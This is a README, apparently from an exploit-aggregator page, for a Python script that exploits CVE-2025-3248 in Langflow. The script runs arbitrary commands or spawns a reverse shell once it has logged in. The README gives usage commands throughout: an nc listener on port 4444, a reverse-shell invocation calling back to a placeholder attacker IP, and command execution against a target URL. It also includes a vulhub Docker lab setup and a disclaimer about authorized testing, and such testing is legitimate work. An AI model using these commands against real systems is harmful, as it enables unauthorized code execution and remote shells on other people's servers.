Share
## https://sploitus.com/exploit?id=D5C2C4F9-735B-50DB-A4A1-C34A555D8C5D
# Authenticated CVE-2025-3248 Langflow Remote Code Execution

This Python script exploits **CVE-2025-3248** to execute arbitrary commands or spawn a reverse shell on a vulnerable system.
**Authentication is required** to use this exploit.

---

## Features

- **Authenticated Command Execution:** Run arbitrary system commands on the target.
- **Reverse Shell:** Spawn a reverse shell to your listener.
- **Proxy Support:** Route requests through a proxy (e.g., Burp Suite).

---

## Requirements

- Python 3.x
- `requests` library

Install dependencies with:

```bash
pip install requests
```

---

## Usage

```bash
python3 exploit.py -u <TARGET_URL> -l <USERNAME> -p <PASSWORD> [-c <COMMAND>] [--proxy <PROXY>] [--lhost <LHOST> --lport <LPORT>]
```

### Arguments

| Argument         | Description                                      | Required |
|------------------|--------------------------------------------------|----------|
| `-u`, `--url`    | Target base URL (e.g., `https://target.com`)     | Yes      |
| `-l`, `--login`  | Admin username                                   | Yes      |
| `-p`, `--password` | Admin password                                 | Yes      |
| `-c`, `--command`| Command to execute on the target                 | No*      |
| `--proxy`        | Proxy URL (e.g., `http://127.0.0.1:8080`)        | No       |
| `--lhost`        | Local host for reverse shell                     | No*      |
| `--lport`        | Local port for reverse shell                     | No*      |

\* You must specify either a command (`-c`) or both `--lhost` and `--lport` for a reverse shell.

---

### Examples

#### 1. Execute a Command

```bash
python3 exploit.py -u https://target.com -l admin -p password -c "id"
```

#### 2. Get a Reverse Shell

Start a listener on your machine:

```bash
nc -lvnp 4444
```

Then run:

```bash
python3 exploit.py -u https://target.com -l admin -p password --lhost YOUR_IP --lport 4444
```

#### 3. Use a Proxy

```bash
python3 exploit.py -u https://target.com -l admin -p password -c "whoami" --proxy http://127.0.0.1:8080
```

---

## Docker image

### Deploying the image

You can deploy the Docker image using the following command:

```bash
podman compose up -d
```

The image will be available at `http://localhost:7860`.
Credits for the compose file: [This repository](https://github.com/vulhub/vulhub/tree/master/langflow/CVE-2025-3248)

---

## Disclaimer

This script is for **educational and authorized penetration testing** purposes only.
**Do not use against systems you do not own or have explicit permission to test.**

---

This readme is AI generated.